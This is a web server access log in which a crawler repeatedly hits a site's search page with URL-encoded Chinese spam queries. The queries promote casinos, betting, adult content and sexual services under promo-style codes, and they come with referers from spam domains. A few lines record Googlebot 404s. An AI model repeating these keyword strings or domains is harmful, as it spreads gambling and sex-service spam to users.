114.119.134.6 - - [29/Aug/2026:23:41:32 -0300] "GET /?s=%E9%99%95%E8%A5%BF%E6%AD%A3%E4%B8%B0%E8%BE%BE%E7%BE%8E%E5%AE%BF-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E8%8D%89%E8%8E%93%E8%A7%86%E9%A2%91%E7%BC%93%E5%AD%98%E5%82%A8%E5%AD%98%E4%BD%8D%E7%BD%AE-%E9%99%95%E8%A5%BF%E6%AD%A3%E4%B8%B0%E8%BE%BE%E7%BE%8E%E5%AE%BFjmsfb-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E8%8D%89%E8%8E%93%E8%A7%86%E9%A2%91%E7%BC%93%E5%AD%98%E5%82%A8%E5%AD%98%E4%BD%8D%E7%BD%AEgham-%E9%99%95%E8%A5%BF%E6%AD%A3%E4%B8%B0%E8%BE%BE%E7%BE%8E%E5%AE%BFiww4o-%E8%8D%89%E8%8E%93%E8%A7%86%E9%A2%91%E7%BC%93%E5%AD%98%E5%82%A8%E5%AD%98%E4%BD%8D%E7%BD%AEqk5g HTTP/1.1" 302 - "https://donnematurexxx.top/wsymdl/%E5%BA%AD%E9%99%A2%E7%A7%8D%E8%94%B7%E8%96%87%E9%A3%8E%E6%B0%B4%E5%A5%BD%E4%B8%8D%E5%A5%BD-0a4001516c/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.253 - - [29/Aug/2026:23:43:36 -0300] "GET /?s=%E9%93%81%E8%A1%80%E8%AF%BB%E4%B9%A6%E7%BD%91%E5%85%8D%E8%B4%B9-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90KK37%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%B9%BC%E5%84%BF%E5%9B%AD%E8%B9%B2%E4%BE%BF%E6%80%8E%E4%B9%88%E8%AE%AD%E7%BB%83-%E9%93%81%E8%A1%80%E8%AF%BB%E4%B9%A6%E7%BD%91%E5%85%8D%E8%B4%B9mp8v6-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90KK37%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%B9%BC%E5%84%BF%E5%9B%AD%E8%B9%B2%E4%BE%BF%E6%80%8E%E4%B9%88%E8%AE%AD%E7%BB%83iy1p-%E9%93%81%E8%A1%80%E8%AF%BB%E4%B9%A6%E7%BD%91%E5%85%8D%E8%B4%B9dsrye-%E5%B9%BC%E5%84%BF%E5%9B%AD%E8%B9%B2%E4%BE%BF%E6%80%8E%E4%B9%88%E8%AE%AD%E7%BB%83le8r HTTP/1.1" 302 - "https://xinfx.cc/fsq/8fa88f8de2bf8ab8a386b5efdfd0df8389f3858bfad0a2d4d8caa8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.253 - - [29/Aug/2026:23:45:43 -0300] "GET /?s=%E9%92%BB%E7%9F%B3%E5%A8%B1%E4%B9%90%E5%9C%BA-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-aupabet-%E9%92%BB%E7%9F%B3%E5%A8%B1%E4%B9%90%E5%9C%BA9nbbd-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-aupabet2rrl-%E9%92%BB%E7%9F%B3%E5%A8%B1%E4%B9%90%E5%9C%BAo1ktl-aupabetra2u HTTP/1.1" 302 - "https://2377.fun/kkc/84949fd08bb5d4c89243dfa99687ead2d081e0d0fef0858af7dfa1b8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.125 - - [29/Aug/2026:23:47:49 -0300] "GET /?s=%E9%90%B5%E7%94%B2%E7%84%A1%E6%95%B5%E7%91%AA%E5%88%A9%E4%BA%9E-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6BB87%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%B0%91%E6%9E%97%E5%AF%BA%E9%9B%BB%E5%BD%B1%E6%9E%97%E5%BF%97%E7%A9%8E-%E9%90%B5%E7%94%B2%E7%84%A1%E6%95%B5%E7%91%AA%E5%88%A9%E4%BA%9E2hkv8-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6BB87%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%B0%91%E6%9E%97%E5%AF%BA%E9%9B%BB%E5%BD%B1%E6%9E%97%E5%BF%97%E7%A9%8Ezrgk-%E9%90%B5%E7%94%B2%E7%84%A1%E6%95%B5%E7%91%AA%E5%88%A9%E4%BA%9E9hr14-%E5%B0%91%E6%9E%97%E5%AF%BA%E9%9B%BB%E5%BD%B1%E6%9E%97%E5%BF%97%E7%A9%8Ewztw HTTP/1.1" 302 - "https://insureoptionsreview.top/rgbfyhn/can%27t%20access%20files%20on%20hard%20drive-6668010407/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.253 - - [29/Aug/2026:23:49:55 -0300] "GET /?s=%E9%87%91%E6%B2%99%E8%B5%8C%E5%9C%BA%E6%80%8E%E4%B9%88%E5%8E%BB-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-nba%E6%80%BB%E5%86%A0%E5%86%9B%E6%88%92%E6%8C%87%E6%8E%92%E5%90%8D-%E9%87%91%E6%B2%99%E8%B5%8C%E5%9C%BA%E6%80%8E%E4%B9%88%E5%8E%BBvvj89-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-nba%E6%80%BB%E5%86%A0%E5%86%9B%E6%88%92%E6%8C%87%E6%8E%92%E5%90%8Dekkx-%E9%87%91%E6%B2%99%E8%B5%8C%E5%9C%BA%E6%80%8E%E4%B9%88%E5%8E%BBkxfhp-nba%E6%80%BB%E5%86%A0%E5%86%9B%E6%88%92%E6%8C%87%E6%8E%92%E5%90%8D1zcf HTTP/1.1" 302 - "https://chsou.cc/sgh/dfbebdd1f3f4de88f58adab786a8b4d1bbc0dd96b682f2d08e97e086bd93d0f9b1d5a59d81dfa3.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.253 - - [29/Aug/2026:23:52:02 -0300] "GET /?s=%E9%87%91%E5%8D%9A%E5%A3%AB%E5%A8%B1%E4%B9%90%E5%9F%8E-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-mlb%E9%9F%A9%E5%9B%BD%E5%AE%98%E7%BD%91-%E9%87%91%E5%8D%9A%E5%A3%AB%E5%A8%B1%E4%B9%90%E5%9F%8E13ib2-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-mlb%E9%9F%A9%E5%9B%BD%E5%AE%98%E7%BD%91naft-%E9%87%91%E5%8D%9A%E5%A3%AB%E5%A8%B1%E4%B9%90%E5%9F%8E8je34-mlb%E9%9F%A9%E5%9B%BD%E5%AE%98%E7%BD%9138z3 HTTP/1.1" 302 - "https://www.binomo.top/hcucedd/zoho%20free%20email%20account-297f450408/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.148.252 - - [29/Aug/2026:23:54:11 -0300] "GET /?s=%E8%BD%AE%E7%9B%98%E7%AD%96%E7%95%A5-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%BD%91AA58%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%BB%9A%E7%90%83%E8%B5%94%E7%8E%87-%E8%BD%AE%E7%9B%98%E7%AD%96%E7%95%A5tjnzu-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%BD%91AA58%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%BB%9A%E7%90%83%E8%B5%94%E7%8E%878ii1-%E8%BD%AE%E7%9B%98%E7%AD%96%E7%95%A57c0a3-%E6%BB%9A%E7%90%83%E8%B5%94%E7%8E%875xm8 HTTP/1.1" 302 - "https://www.dwrtstore.top/pthlqpdv/%E6%96%87%E7%AB%A0%E7%9A%84%E6%A7%8B%E6%88%90%E9%83%A8%E5%88%86-48052b2750/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.159.121 - - [29/Aug/2026:23:56:16 -0300] "GET /?s=%E8%BC%AA%E7%9B%A4%E7%B6%93%E9%A9%97-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%B6%B2DD86%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%8D%9A%E7%90%83-%E8%BC%AA%E7%9B%A4%E7%B6%93%E9%A9%974lix8-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%B6%B2DD86%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%8D%9A%E7%90%839ovw-%E8%BC%AA%E7%9B%A4%E7%B6%93%E9%A9%97rbmbe-%E5%8D%9A%E7%90%83ngfu HTTP/1.1" 302 - "https://www.ohfuck.top/xoktdal/not%20shutting%20down%20laptop%20for%20days-6123541805/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.74.9 - - [29/Aug/2026:23:57:05 -0300] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.74.10 - - [29/Aug/2026:23:57:06 -0300] "GET /wp-content/uploads/2018/01/Upcoming-market-catalysts-in-Q1-2018-1.pdf HTTP/1.1" 404 - "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
114.119.145.163 - - [29/Aug/2026:23:58:22 -0300] "GET /?s=%E8%B7%9F%E4%BD%A0%E5%90%83%E9%A5%AD%E7%8E%A9%E6%89%8B%E6%9C%BA%E7%9A%84%E7%94%B7%E4%BA%BA-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E7%A5%9D%E7%A6%8F%E5%88%AB%E4%BA%BA%E6%9C%89%E5%A5%B3%E6%9C%8B%E5%8F%8B%E7%9A%84%E5%8F%A5%E5%AD%90-%E8%B7%9F%E4%BD%A0%E5%90%83%E9%A5%AD%E7%8E%A9%E6%89%8B%E6%9C%BA%E7%9A%84%E7%94%B7%E4%BA%BAlzhhm-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E7%A5%9D%E7%A6%8F%E5%88%AB%E4%BA%BA%E6%9C%89%E5%A5%B3%E6%9C%8B%E5%8F%8B%E7%9A%84%E5%8F%A5%E5%AD%90zq5t-%E8%B7%9F%E4%BD%A0%E5%90%83%E9%A5%AD%E7%8E%A9%E6%89%8B%E6%9C%BA%E7%9A%84%E7%94%B7%E4%BA%BA3jjwb-%E7%A5%9D%E7%A6%8F%E5%88%AB%E4%BA%BA%E6%9C%89%E5%A5%B3%E6%9C%8B%E5%8F%8B%E7%9A%84%E5%8F%A5%E5%AD%90640l HTTP/1.1" 302 - "https://bestoff.top/xshjul/%E6%80%8E%E4%B9%88%E7%9C%8B%E5%93%88%E5%BC%97h6%E6%98%AF%E5%93%AA%E6%AC%BE%E7%9A%84-016b65036e/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.74.8 - - [29/Aug/2026:23:59:02 -0300] "GET /wp-content/uploads/2017/10/Go-ahead-for-first-anti-IL-23-mAb-to-treat-psoriasis.pdf HTTP/1.1" 404 - "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
114.119.159.121 - - [30/Aug/2026:00:00:28 -0300] "GET /?s=%E8%B6%B3%E7%90%83%E7%9B%B4%E6%92%AD%E7%BD%91%E5%9D%80-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%BD%91AA58%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E8%80%81%E8%99%8E%E6%9C%BA%E6%8A%80%E5%B7%A7-%E8%B6%B3%E7%90%83%E7%9B%B4%E6%92%AD%E7%BD%91%E5%9D%80uq94u-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%BD%91AA58%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E8%80%81%E8%99%8E%E6%9C%BA%E6%8A%80%E5%B7%A7c7y3-%E8%B6%B3%E7%90%83%E7%9B%B4%E6%92%AD%E7%BD%91%E5%9D%80xp1i6-%E8%80%81%E8%99%8E%E6%9C%BA%E6%8A%80%E5%B7%A792k5 HTTP/1.1" 302 - "https://2377.fun/kkc/86b0abd08993dbec8085b0a7d5dada84bdbe.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
43.167.239.66 - - [30/Aug/2026:00:02:18 -0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
114.119.134.6 - - [30/Aug/2026:00:02:35 -0300] "GET /?s=%E8%B6%8A%E5%8D%97%E8%8A%BD%E5%BA%84%E6%9C%89%E6%80%A7%E6%9C%8D%E5%8A%A1%E5%90%97-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E4%B8%93%E7%A1%95%E5%AD%A6%E7%A1%95%E5%95%A5%E5%8C%BA%E5%88%AB%E5%95%8A-%E8%B6%8A%E5%8D%97%E8%8A%BD%E5%BA%84%E6%9C%89%E6%80%A7%E6%9C%8D%E5%8A%A1%E5%90%97y3fxx-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E4%B8%93%E7%A1%95%E5%AD%A6%E7%A1%95%E5%95%A5%E5%8C%BA%E5%88%AB%E5%95%8Avtor-%E8%B6%8A%E5%8D%97%E8%8A%BD%E5%BA%84%E6%9C%89%E6%80%A7%E6%9C%8D%E5%8A%A1%E5%90%97d2t6k-%E4%B8%93%E7%A1%95%E5%AD%A6%E7%A1%95%E5%95%A5%E5%8C%BA%E5%88%AB%E5%95%8Acp7n HTTP/1.1" 302 - "https://www.xxxindian.top/gakum/%E6%AD%90%E5%86%A0%E8%B3%BD%E7%A8%8B2023-2c5e2b3050/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.148.252 - - [30/Aug/2026:00:04:41 -0300] "GET /?s=%E8%B5%8C%E5%8D%9A%E8%AE%BA%E5%9D%9B-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%A5%BD%E6%96%99%20%E8%B4%B4%20%E5%A3%AB-%E8%B5%8C%E5%8D%9A%E8%AE%BA%E5%9D%9B7jfsh-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%A5%BD%E6%96%99%20%E8%B4%B4%20%E5%A3%AB9q20-%E8%B5%8C%E5%8D%9A%E8%AE%BA%E5%9D%9Bnu341-%E5%A5%BD%E6%96%99%20%E8%B4%B4%20%E5%A3%ABbxb5 HTTP/1.1" 302 - "https://www.fountainhead-game.com/epe/d6acd48de6a4deabe2daf38fd1dacb8eee9ad3a7e8d1abb3808cd2dfb291dbb38cdcdae5868cb0d1e6bc80b0ab.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.163 - - [30/Aug/2026:00:07:04 -0300] "GET /?s=%E8%B3%AD%E5%A0%B4%E5%A4%A7%E8%BC%AA%E7%9B%A4-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6DD96%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%BA%BB%E5%B0%87%E7%AE%97%E7%89%8C%E6%8A%80%E5%B7%A7-%E8%B3%AD%E5%A0%B4%E5%A4%A7%E8%BC%AA%E7%9B%A4llfkc-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6DD96%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%BA%BB%E5%B0%87%E7%AE%97%E7%89%8C%E6%8A%80%E5%B7%A76v4p-%E8%B3%AD%E5%A0%B4%E5%A4%A7%E8%BC%AA%E7%9B%A4w56sf-%E9%BA%BB%E5%B0%87%E7%AE%97%E7%89%8C%E6%8A%80%E5%B7%A7755d HTTP/1.1" 302 - "https://ranch65.top/rtyc/%E9%87%91%E6%B2%99%20%E8%8B%B1%E6%96%87-2b5b760205/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.137.190 - - [30/Aug/2026:00:09:05 -0300] "GET /?s=%E8%B0%83%E5%A4%9A%E9%9F%B3%E5%AD%97%E7%BB%84%E8%AF%8D%E6%B3%A8%E9%9F%B3-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%88%90%E9%83%BD%E5%85%B4%E9%9A%86%E6%B9%96%E6%9C%AA%E6%9D%A5%E5%8F%91%E5%B1%95%E6%80%8E%E4%B9%88%E6%A0%B7-%E8%B0%83%E5%A4%9A%E9%9F%B3%E5%AD%97%E7%BB%84%E8%AF%8D%E6%B3%A8%E9%9F%B3jvj3b-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%88%90%E9%83%BD%E5%85%B4%E9%9A%86%E6%B9%96%E6%9C%AA%E6%9D%A5%E5%8F%91%E5%B1%95%E6%80%8E%E4%B9%88%E6%A0%B7p8cn-%E8%B0%83%E5%A4%9A%E9%9F%B3%E5%AD%97%E7%BB%84%E8%AF%8D%E6%B3%A8%E9%9F%B3hjfy3-%E6%88%90%E9%83%BD%E5%85%B4%E9%9A%86%E6%B9%96%E6%9C%AA%E6%9D%A5%E5%8F%91%E5%B1%95%E6%80%8E%E4%B9%88%E6%A0%B75ddw HTTP/1.1" 302 - "https://www.yccmall.top/xyotz/%E9%87%91%20%E5%A5%BD%E5%8B%9D%20%E5%A8%9B%E6%A8%82%20%E5%9F%8E-280c541f5d/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.6 - - [30/Aug/2026:00:11:06 -0300] "GET /?s=%E8%AE%A9%E7%90%83%E7%9B%98%20%E6%95%99%E5%AD%A6-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%98%BF%E6%96%AF%E9%A1%BF%E9%A9%AC%E4%B8%81%E7%BE%8E%E5%9B%BD%E5%AE%98%E7%BD%91-%E8%AE%A9%E7%90%83%E7%9B%98%20%E6%95%99%E5%AD%A61mayz-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%98%BF%E6%96%AF%E9%A1%BF%E9%A9%AC%E4%B8%81%E7%BE%8E%E5%9B%BD%E5%AE%98%E7%BD%91twby-%E8%AE%A9%E7%90%83%E7%9B%98%20%E6%95%99%E5%AD%A6ha543-%E9%98%BF%E6%96%AF%E9%A1%BF%E9%A9%AC%E4%B8%81%E7%BE%8E%E5%9B%BD%E5%AE%98%E7%BD%91tje4 HTTP/1.1" 302 - "https://www.reebokclassicgr.top/wkwxi/%E6%99%BA%E5%88%A9%E7%94%B2%E7%B5%84%E8%81%AF%E8%B3%BD-7a627c0f60/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.137.190 - - [30/Aug/2026:00:13:13 -0300] "GET /?s=%E8%AE%930.5%E7%90%83-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%B6%B2DD86%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%BF%85%E8%B4%8F%E5%A8%9B%E6%A8%82%E5%9F%8E-%E8%AE%930.5%E7%90%83vbke1-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%B6%B2DD86%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%BF%85%E8%B4%8F%E5%A8%9B%E6%A8%82%E5%9F%8E7t4y-%E8%AE%930.5%E7%90%83ol4uh-%E5%BF%85%E8%B4%8F%E5%A8%9B%E6%A8%82%E5%9F%8Exsxf HTTP/1.1" 302 - "https://morecheap.top/zfnfu/%E9%AC%A5%E5%9C%B0%E4%B8%BB%E8%A6%8F%E5%89%87-0876463716/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.125 - - [30/Aug/2026:00:15:20 -0300] "GET /?s=%E8%A3%85%E4%BF%AE%E7%BB%8F%E9%AA%8C%E8%AE%BA%E5%9D%9B-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E7%9F%B3%E5%AE%B6%E5%BA%84%E7%99%BD%E9%B9%BF%E6%B8%A9%E6%B3%89%E5%9B%BE%E7%89%87-%E8%A3%85%E4%BF%AE%E7%BB%8F%E9%AA%8C%E8%AE%BA%E5%9D%9Bgjipr-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E7%9F%B3%E5%AE%B6%E5%BA%84%E7%99%BD%E9%B9%BF%E6%B8%A9%E6%B3%89%E5%9B%BE%E7%89%87iqso-%E8%A3%85%E4%BF%AE%E7%BB%8F%E9%AA%8C%E8%AE%BA%E5%9D%9Bpom5v-%E7%9F%B3%E5%AE%B6%E5%BA%84%E7%99%BD%E9%B9%BF%E6%B8%A9%E6%B3%89%E5%9B%BE%E7%89%87jn61 HTTP/1.1" 302 - "https://www.zutao.top/vugfhdyz/%E7%90%85%E7%90%8A%E6%A6%9C%E5%B0%8F%E8%AA%AA%E7%B5%90%E5%B1%80-561d38430e/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.159.121 - - [30/Aug/2026:00:17:27 -0300] "GET /?s=%E8%A1%8C%E4%B8%80%E6%AD%A5%E5%8F%B9%E4%B8%80%E5%A3%B0%E5%8E%9F%E5%94%B1%E8%A7%86%E9%A2%91-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%81%BF%E5%BC%80%E7%9A%84%E6%84%8F%E6%80%9D-%E8%A1%8C%E4%B8%80%E6%AD%A5%E5%8F%B9%E4%B8%80%E5%A3%B0%E5%8E%9F%E5%94%B1%E8%A7%86%E9%A2%91ax6nz-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%81%BF%E5%BC%80%E7%9A%84%E6%84%8F%E6%80%9Dzs6h-%E8%A1%8C%E4%B8%80%E6%AD%A5%E5%8F%B9%E4%B8%80%E5%A3%B0%E5%8E%9F%E5%94%B1%E8%A7%86%E9%A2%91xkj8g-%E9%81%BF%E5%BC%80%E7%9A%84%E6%84%8F%E6%80%9Dizok HTTP/1.1" 302 - "https://www.dongxibao.top/svpbap/%E9%BB%91%E6%BA%AA%E8%B0%B7%E9%B2%81%E5%8D%A1%E6%8F%90%E8%80%B6%E4%BD%8D%E7%BD%AE-0b7304195d/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.125 - - [30/Aug/2026:00:19:32 -0300] "GET /?s=%E8%99%B9%E5%8F%A3%E5%8D%80%E5%93%AA%E8%A3%A1%E5%8F%AF%E4%BB%A5%E5%8C%85%E6%9C%88%E5%81%9C%E8%BB%8A-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6BB87%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%9B%BB%E8%A9%B1%E9%80%9A%E4%BA%86%E9%A6%AC%E4%B8%8A%E5%B0%B1%E6%8E%9B%E6%96%B7%E4%BA%86-%E8%99%B9%E5%8F%A3%E5%8D%80%E5%93%AA%E8%A3%A1%E5%8F%AF%E4%BB%A5%E5%8C%85%E6%9C%88%E5%81%9C%E8%BB%8Ago9rn-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6BB87%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%9B%BB%E8%A9%B1%E9%80%9A%E4%BA%86%E9%A6%AC%E4%B8%8A%E5%B0%B1%E6%8E%9B%E6%96%B7%E4%BA%863mef-%E8%99%B9%E5%8F%A3%E5%8D%80%E5%93%AA%E8%A3%A1%E5%8F%AF%E4%BB%A5%E5%8C%85%E6%9C%88%E5%81%9C%E8%BB%8A8khop-%E9%9B%BB%E8%A9%B1%E9%80%9A%E4%BA%86%E9%A6%AC%E4%B8%8A%E5%B0%B1%E6%8E%9B%E6%96%B7%E4%BA%8606n5 HTTP/1.1" 302 - "https://store66.top/xaftbvpx/%E8%A2%AB%E7%A6%81%E6%AD%A2%E7%9A%84%E9%9F%B3%E6%A8%82%E9%8B%BC%E7%90%B4%E4%BC%B4%E5%A5%8F-5635680c41/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.74.9 - - [30/Aug/2026:00:20:57 -0300] "GET /wp-content/uploads/2021/08/FDA-approves-AstraZenecas-anifrolumab-for-lupus.pdf HTTP/1.1" 404 - "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
66.249.74.8 - - [30/Aug/2026:00:21:09 -0300] "GET /wp-content/uploads/2020/02/Upcoming-market-catalysts-2019.pdf HTTP/1.1" 404 - "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
